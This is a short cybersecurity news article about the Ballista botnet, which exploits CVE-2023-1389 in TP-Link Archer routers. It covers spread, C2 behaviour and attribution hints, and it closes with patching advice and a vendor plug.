A newly discovered botnet, named ‘Ballista’ has been found actively exploiting a critical remote code execution vulnerability (CVE-2023-1389) in TP-Link Archer routers. The botnet has already compromised over 6,000 devices worldwide, with infections concentrated in Brazil, Poland, the United Kingdom, Bulgaria, and Turkey. Cybersecurity experts warn that the botnet poses a significant threat, particularly to organizations in the manufacturing, healthcare, technology, and service sectors.
First detected on January 10, 2025, Ballista leverages an unauthenticated command injection flaw, allowing attackers to remotely execute arbitrary commands on vulnerable routers. The attack is initiated through a dropper script, ‘dropbpb.sh’, which downloads and executes the main malware payload. Once installed, the malware establishes an encrypted command-and-control (C2) channel on port 82, enabling operators to issue remote commands, launch denial-of-service (DoS) attacks, and exfiltrate sensitive data.
Security researchers have observed that Ballista is under active development. Recent iterations of the malware have transitioned from hard-coded IP addresses to using TOR network domains, enhancing its stealth capabilities and resilience against takedown efforts. Further analysis of the botnet’s infrastructure suggests potential links to a threat actor based in Italy, as indicated by Italian language strings found within the malware and the geographical location of some C2 servers.
Authorities and security researchers are actively tracking Ballista’s operations, with efforts underway to disrupt its infrastructure and mitigate its impact on affected networks worldwide.
To mitigate the risk of infection, experts strongly advise TP-Link Archer router users to apply the latest firmware updates addressing CVE-2023-1389. Additionally, disabling unnecessary remote management features and monitoring network activity can help prevent exploitation.
The rapid spread of Ballista underscores the growing risks posed by unpatched IoT devices. Now more than ever, stronger network security practices are needed to defend against evolving threats. Otonata empowers individuals with expert insights, threat intelligence, and security solutions to stay ahead of evolving cyber threats like Ballista.